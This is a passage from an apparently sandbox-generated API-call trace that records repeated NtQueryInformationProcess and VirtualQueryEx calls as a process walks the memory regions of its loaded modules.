__alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.273] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977650000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977650000, AllocationBase=0x7ff977650000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.273] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9673a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9673a0000, AllocationBase=0x7ff9673a0000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.273] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f2f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f2f0000, AllocationBase=0x7ff96f2f0000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.273] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967350000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967350000, AllocationBase=0x7ff967350000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.273] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967340000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967340000, AllocationBase=0x7ff967340000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.273] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974bd0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974bd0000, AllocationBase=0x7ff974bd0000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.273] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967130000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967130000, AllocationBase=0x7ff967130000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.274] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972a20000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972a20000, AllocationBase=0x7ff972a20000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.274] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.274] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff969b60000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff969b60000, AllocationBase=0x7ff969b60000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.274] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.274] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967010000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967010000, AllocationBase=0x7ff967010000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.274] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.274] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ff0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966ff0000, AllocationBase=0x7ff966ff0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.274] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.274] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff970ee0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff970ee0000, AllocationBase=0x7ff970ee0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.274] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.274] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b330000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b330000, AllocationBase=0x7ff96b330000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.274] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.274] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966f10000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966f10000, AllocationBase=0x7ff966f10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.274] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.274] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973bb0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973bb0000, AllocationBase=0x7ff973bb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.274] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966e30000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966e30000, AllocationBase=0x7ff966e30000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.275] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e000000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96e000000, AllocationBase=0x7ff96e000000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.275] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cc10000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96cc10000, AllocationBase=0x7ff96cc10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.275] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973be0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973be0000, AllocationBase=0x7ff973be0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.275] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966de0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966de0000, AllocationBase=0x7ff966de0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.275] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966d50000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966d50000, AllocationBase=0x7ff966d50000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.275] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966d00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966d00000, AllocationBase=0x7ff966d00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.275] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c450000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c450000, AllocationBase=0x7ff96c450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.275] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.275] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968e90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968e90000, AllocationBase=0x7ff968e90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966b10000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966b10000, AllocationBase=0x7ff966b10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cbd0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96cbd0000, AllocationBase=0x7ff96cbd0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f50000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971f50000, AllocationBase=0x7ff971f50000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff976f70000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff976f70000, AllocationBase=0x7ff976f70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f40000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971f40000, AllocationBase=0x7ff971f40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cf90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96cf90000, AllocationBase=0x7ff96cf90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966af0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966af0000, AllocationBase=0x7ff966af0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ad0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966ad0000, AllocationBase=0x7ff966ad0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.276] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973590000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973590000, AllocationBase=0x7ff973590000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977cb0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977cb0000, AllocationBase=0x7ff977cb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96d300000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96d300000, AllocationBase=0x7ff96d300000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96a270000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96a270000, AllocationBase=0x7ff96a270000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974170000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974170000, AllocationBase=0x7ff974170000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ac0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966ac0000, AllocationBase=0x7ff966ac0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966a90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966a90000, AllocationBase=0x7ff966a90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9667d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9667d0000, AllocationBase=0x7ff9667d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b080000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b080000, AllocationBase=0x7ff96b080000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.277] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.277] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c360000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c360000, AllocationBase=0x7ff96c360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9664b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9664b0000, AllocationBase=0x7ff9664b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966400000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966400000, AllocationBase=0x7ff966400000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] 